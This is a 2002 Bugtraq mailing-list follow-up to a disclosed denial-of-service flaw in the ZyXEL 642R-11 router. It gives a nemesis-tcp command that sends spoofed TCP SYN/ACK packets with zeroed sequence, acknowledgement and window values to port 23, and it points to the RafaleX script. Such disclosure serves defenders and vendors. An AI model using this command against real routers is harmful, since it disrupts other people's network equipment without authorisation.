[25826] in bugtraq

home help back first fref pref prev next nref lref last post

Follow: ZyXEL 642R-11 AJ.6 service DoS -- additional informations

daemon@ATHENA.MIT.EDU (Kistler Ueli)
Mon Jun 17 19:03:52 2002

Message-ID: <3D0E25E5.9040907@gmx.ch>
Date: Mon, 17 Jun 2002 20:09:41 +0200
From: Kistler Ueli <iuk@gmx.ch>
MIME-Version: 1.0
To: Bugtraq <Bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello

NOTE:
Set also these values.. Rafale used this by default:
ACK=0, SEQ=0, WIN=0

With nemesis:
nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0
-s 0 -a 0 -y 23

Try the RafaleX script.. this will work certainly if the router is
vulnerable.

Regards,
Ueli Kistler
eclipse@packx.net / iuk@gmx.ch
www.packx.net / www.eclipse.fr.fm

-- 


home help back first fref pref prev next nref lref last post